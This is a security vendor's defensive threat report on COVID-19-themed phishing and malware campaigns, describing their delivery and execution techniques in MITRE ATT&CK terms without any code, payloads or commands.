The global COVID-19 pandemic is generating a substantial uptick in the production and delivery of Coronavirus themed malware. Due to a rapidly growing number of Indicators of Compromise (IOC)’s, this report covers the key behaviors by aligning to the MITRE ATT&CK Framework.
MITRE ATT&CK launched in 2018 is a security framework that describes the various stages through which an attack will generally progress. The intent of the framework is to provide “better detection of post-compromise cyber adversary behavior”. This framework is gaining increased adoption in the security community and VMware Carbon Black actively maps our products to this framework to provide added context for our customers.
Phishing emails are the primary source, which in turn manifest into harmful threats that include malicious attachments that deliver payloads to infect victim machines. Some recently observed payloads are delivering trojans, backdoors, remote access trojan (RAT) functionality, cryptominers and botnet participation. In one variant that was analyzed, the malware was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. Malicious functionality has also been observed in fake mobile apps, fake Coronavirus maps and fake VPN software. These recent observations show an increased overall risk to corporate as well as personal security, at a time where many countries and corporations are enforcing remote working.
Background
The COVID-19 global pandemic has created an unprecedented situation with far-reaching impacts on our daily lives. Many countries have encouraged or mandated social isolation, including working remotely, in an effort to contain the spread of the virus. Much is still unknown leading to a climate of uncertainty. Unfortunately during times of uncertainty and doubt, threat actors are ready to take advantage of the widespread desire to be informed. This is already happening with the Coronavirus. People and businesses who are already in a heightened state of emotion, and on overload with changes in all aspects of their lives, are now at risk from bad actors intent on stealing PII, sensitive information, payment details and more, simply by using luring tactics that feature Coronavirus themed malware.
While this technique isn’t new, history has proven that cyber crime often increases during times of heightened emotion, distraction and stress, such as certain religious or festive holidays, elections, and even Black Friday sales events. The actors exploit these challenging times to find avenues for distributing their malware.
This article aims to increase awareness of recently observed threats that are leveraging the COVID-19 pandemic by describing current examples in alignment with the MITRE ATT&CK Framework. MITRE ATT&CK has had a major impact on the cybersecurity industry due to its rapid adoption in the security community. Aligning to the MITRE ATT&CK Framework is important as there is a growing number of IOC’s being produced daily. HIstorically, such as in the case of Emotet, handling such large volumes of IOC’s can become overwhelming for defenders. Understanding the behavioral patterns of the different types of threats allows for easier interpretation and proactive defense.
The intent is to raise awareness for customers, SOC teams, IR partners, MSSPs and all defenders out in the InfoSec community, and to aid them with detection, protection and response of such malware we will be examining the types of attacks that appear to be most common.
For further information and resources pertaining to COVID-19, please refer to the VMware Carbon Black COVID-19: Cybersecurity Community Resources page.
Technical Analysis
In the following section we will focus on the first two phases of the MITRE ATT&CK framework: Initial Access and Execution. We focus on these phases because we have observed the largest overlap from multiple actors that we are tracking. VMware Carbon Black’s Threat Analysis Unit will continue to follow up with detailed analysis of individual actors and campaigns, digging deeper into the later stages of the attack.
Before we introduce these two tactic categories we would like to specifically highlight one of the most frequently leveraged techniques. Masquerading (T1036) occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. It is one of the key techniques employed in many of the observed threat types. While this may not come as a surprise, educating your end users, family and friends should be a priority during this unsettling time. Similar to campaigns that target religious or festive holidays, masquerading is the perfect tactic used by the bad actors, who have no regard for their victims. Their mission is clear, and masquerading helps them to evade defenses and get a few steps closer to achieving their goals.
Initial Access
This is the first tactic employed by bad actors whose hopes are to compromise as many vulnerable machines as possible. While many people and businesses are trying to share legitimate information related to COVID-19, the sheer volume of information being communicated lends itself to the delivery of fake data sheets, infographics, links to tracking maps, as well as fake software. The intent is to catch the end user off guard in order to deliver the malware. Other tactics could also include drive-by compromise (T1189) or supply chain compromise (T1195). The rationale behind this is due to the rapid registration of coronavirus themed domain names that have appeared on MalwarePatrol.net. The count at the time of writing is currently over 5000 registered domain names. Using Coronavirus or COVID-19 themed domain names could easily trick legitimate users into visiting websites and becoming subject to drive-by or supply chain compromise. The list can be found here.
Spearphishing Attachment – TID:T1193
Attachments are a popular choice for obtaining initial infection. Observed attachment file types include, but are not limited to files with the following extensions: ZIP, 7Z, TAR, RAR, JAR, VBS, IMG, GZ, EXE, ISO, SCR, RTF, PDF, DOC, XLS. Examples of phishing emails may contain spoofed email headers and authentic messaging to lure the victim into a false sense of security. Attachment names observed also include names that are attention grabbing in order to arouse enough curiosity for the end user to feel the need to open it. Phishing emails can contain spelling, grammar or formatting mistakes, as shown in the example below. With that said, more advanced threat actors will be particularly good at producing an authentic looking email message, as we will see later in this report.
Figure 1: Phishing email example containing malicious Word document attachment
A common technique is to create interesting content for malicious Microsoft Office related email attachments in order to convince the user to click on a link.. This typically will invoke the underlying malicious code embedded within the document, which is usually a malicious MS Office macro using VBA code.
Figure 2: Typical end-user prompt to trigger embedded payload
In our next example we see an ISO file included as an attachment.
Figure 3: Phishing email example containing malicious ISO file attachment
The ISO attachment contains a SCR file which is actually a PE file. When executed, the PE file deploys RemCos, a prolific RAT which is being continually updated and sold on the Dark Web. The flow diagram shown below shows a visual representation of the underlying effects of opening this particular email attachment.
Figure 4: Partial process flow diagram taken from VMware Carbon Black Endpoint Standard
In the next example, a PDF attachment contains a clickable link which redirects the user to an external site hosting a PHP page.
Figure 5: Example PDF Attachment containing clickable link
If the user clicks the link within the PDF, they are presented with a fake Office365 landing page masquerading as a legitimate Office365 page.
Figure 6: Fake Office365 landing page
After the user clicks on the “download file” button, they are presented with a fake Office365 login prompt which harvests any details inputted by the end user.
Figure 7: Fake Office365 login prompt
In the next example an attachment named ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z contains an executable, which when opened deploys AgentTesla. AgentTesla is used by threat actors to record keystrokes and other sensitive information, and to receive them via their C2 channel.
Figure 8: 7z file containing executable
Another example uses an attachment name AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe which when opened, launches RegAsm (T1121) to deliver Lokibot, another popular and highly effective information stealer. This attachment contains an embedded AutoIT script to deliver the main payload.
Figure 9: Snippet of hex dump showing obfuscated AutoIT script embedded in PE file
Another attachment named COVID-19.INFO.37842702.doc installs a trojan, by leveraging PowerShell (T1086) and CSCRIPT (a technique used for signed script proxy execution (T1216)) to launch a VBS file which is a common scripting (T1064) technique.
Figure 10: Execution path displayed within VMware Carbon Black EDR
Execution
User execution (T1204) is symptomatic of when an end user opens a phishing email or attachment. There are other specific TTP’s that have been observed with the execution of Coronavirus themed payloads.
Powershell (T1086):
When a particular MS Word document attachment named “CORONA VIRUS REMEDY ISREAL.doc” is opened, executed an obfuscated command within a hidden PowerShell window. This in turn invokes two signed Microsoft binaries: csc.exe and cvtres.exe, which are commonly seen in the defense evasion, compile after delivery (T1500) tactic. These types of behaviours are commonly seen in commodity malware, and are highly effective at delivering and compiling a payload using legitimate Windows binaries.
Figure 11: Snippet of obfuscated Powershell command
Dynamic Data Exchange (T1173):
Malicious MS Office documents still manage to successfully exploit unpatched versions of MS Office due to the typical DDE vulnerabilities. Some of these common CVE’s are: CVE-2012-0158, CVE-2017-11882 and CVE-2018-0798.
In a recent Coronavirus themed MS Word document attachment, MS Word is the target for exploitation for client execution (T1203) using DDE exploits to launch the MS Equation Editor. The purpose is to deliver and execute a signed binary proxy execution (T1218), which in this instance was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. The VMware Carbon Black TAU team is still investigating this particular threat.
More on Masquerading
Masquerading has been highlighted so far in relation to malicious phishing email attachments. Unfortunately third party software is not excluded from this. There is evidence to suggest that the following categories of software are being weaponised in order to target potential victims.
Fake VPN clients/installers:
A recent report highlights the fact that while many people globally adapt to working from home for the foreseeable future, there is a growing number of fake VPN clients and installers that are disguised as malware. The example discussed in the report delivers the AZORult malware via a fake ProtonVPN client, whereby post-execution the victim machine becomes part of the AZORult botnet.
Remote meeting software:
TAU are currently monitoring for the appearance of weaponized or fake remote meeting software. TAU are anticipating that there may be an eventual increase over the coming weeks as more people around the world rely on remote working.
Mobile apps:
Avast have recently released a repository for researchers and defenders due to the growing number of apps that have appeared for Android users. In a recent report, a fake Android Coronavirus app was discovered to be delivering ransomware.
Figure 12: Snippet showing potential malicious and fake apps
Fake Coronavirus maps:
In a report published recently, a fake Coronavirus map was discovered which silently steals passwords, crypto wallets and other sensitive information.
Figure 13: Malicious fake Coronavirus map
Ransomware
Data encrypted for impact (T1486) is observed with a new family of ransomware known as Coronavirus which was recently reported. TAU has observed an upwards trend in ransomware for some time now, but sadly there has never been a better time for the threat actors to create and distribute ransomware. Ransomware is an ongoing and continual threat which TAU observes very closely. A full write up will be published soon on this new ransomware campaign.
Figure 14: Coronavirus ransomware message
Summary
The threats that we are seeing that leverage the COVID-19 pandemic are varied, but primarily familiar. The key here is that the uncertainty and thirst for knowledge about the global pandemic, coupled with the response of working remotely, create new opportunities for exploitation. It may seem obvious, but masquerading and user execution are the two behaviors seen across most of the recently observed threats. While some public lists containing IOC’s do exist, the current global situation could result in a significant increase in cyber attacks. The jump in IOC’s may shortly become unmanageable. Understanding the behaviors, and leveraging the MITRE ATT&CK Framework will help to detect and mitigate such threats. While Coronavirus themed malware includes a variety or different threats,many of the techniques are seen with regular commodity based malware. As ever, a layered approach should be taken to reduce the risk of such threats. Defenders should be extra vigilant in not only staying up to date with future Coronavirus related threats, but also advising their family, friends and colleagues of such threats.
Indicators of Compromise (IOC’s)
Please refer to the VMware Carbon Black TAU Github page for a list of IOC’s.